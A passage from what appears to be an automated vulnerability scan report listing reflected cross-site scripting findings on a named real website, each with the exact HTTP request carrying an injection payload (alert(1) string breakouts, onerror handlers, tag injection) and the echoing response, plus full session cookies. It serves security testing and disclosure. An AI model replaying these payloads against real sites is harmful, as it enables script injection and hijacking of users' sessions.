Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIANFYd9Qok%2fkykcMIgmZjKoQL2Fau65ih2OqtICLHe6Q3eP1TKxG1T%2bPy4j2Jq7jhcGjt6%2fBNVb76RzfvkzfqVaz3rHjvWW%2bqEgtHilu1omsK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:41 GMT
Connection: close
Content-Length: 19663
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/homepage.aspx&he=imlive.com&ul=/?17713'-alert(1)-'0edf03efbd6=1&qs=17713'-alert(1)-'0edf03efbd6=1&qs=17713'-alert(1)-'0edf03efbd6=1&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function
...[SNIP]...

2.49. http://imlive.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99c04"><a>b9169bf5b73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?99c04"><a>b9169bf5b73=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIANFYd9Qok%2fkykcMIgmZjKoQL2Fau65ih2OqtICLHe6Q3eP1TKxG1T%2bPy4j2Jq7jhcGjt6%2fBNVb76RzfvkzfqVaz3rHjvWW%2bqEgtHilu1omsK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:33 GMT
Connection: close
Content-Length: 19502
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/?99c04"><a>b9169bf5b73=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.50. http://imlive.com/SiteInformation.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /SiteInformation.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 652a8'onerror%3d'alert(1)'f61ce20483c was submitted in the REST URL parameter 1. This input was echoed as 652a8'onerror='alert(1)'f61ce20483c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /652a8'onerror%3d'alert(1)'f61ce20483c HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:56 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:56 GMT
Connection: close
Content-Length: 8302
Vary: Accept-Encoding


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/652a8'onerror='alert(1)'f61ce20483c/&lr=1107816009&ud=0&pe=404.asp&qs=404;http://imlive.com:80/652a8'onerror='alert(1)'f61ce20483c/&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

2.51. http://imlive.com/awardarena/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /awardarena/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80d56'-alert(1)-'698666eeaa0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /awardarena/?80d56'-alert(1)-'698666eeaa0=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:57 GMT
Connection: close
Content-Length: 25371
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostawards.aspx&he=imlive.com&ul=/awardarena/?80d56'-alert(1)-'698666eeaa0=1&qs=80d56'-alert(1)-'698666eeaa0=1&qs=80d56'-alert(1)-'698666eeaa0=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function
...[SNIP]...

2.52. http://imlive.com/awardarena/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /awardarena/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9ece"><a>e6c79bedc05 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /awardarena/?c9ece"><a>e6c79bedc05=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:54 GMT
Connection: close
Content-Length: 25222
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/awardarena/?c9ece"><a>e6c79bedc05=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.53. http://imlive.com/become_celeb.asp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /become_celeb.asp

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 47df2'onerror%3d'alert(1)'f893addb900 was submitted in the REST URL parameter 1. This input was echoed as 47df2'onerror='alert(1)'f893addb900 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /47df2'onerror%3d'alert(1)'f893addb900 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:12 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2FSf8bs6wRlvXx1sFag%3D%3D; path=/
Set-Cookie: ix=k; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:25:11 GMT
Connection: close
Content-Length: 19702
Vary: Accept-Encoding


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/47df2'onerror='alert(1)'f893addb900/&lr=1107816008&ud=0&pe=404.asp&qs=404;http://imlive.com:80/47df2'onerror='alert(1)'f893addb900/&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

2.54. http://imlive.com/become_host.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /become_host.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15c68'-alert(1)-'911a666a53f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /become_host.asp?15c68'-alert(1)-'911a666a53f=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:25:27 GMT
Connection: close
Content-Length: 21781
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/becomehost.aspx&he=imlive.com&ul=/becomehost.aspx?15c68'-alert(1)-'911a666a53f=1&qs=15c68'-alert(1)-'911a666a53f=1&qs=15c68'-alert(1)-'911a666a53f=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function
...[SNIP]...

2.55. http://imlive.com/become_host.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /become_host.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8175d"><a>ad0c10fb84f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /become_host.asp?8175d"><a>ad0c10fb84f=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:25:23 GMT
Connection: close
Content-Length: 21593
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/becomehost.aspx?8175d"><a>ad0c10fb84f=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.56. http://imlive.com/becomehost.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /becomehost.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbb67'-alert(1)-'15501fee645 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /becomehost.aspx?cbb67'-alert(1)-'15501fee645=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
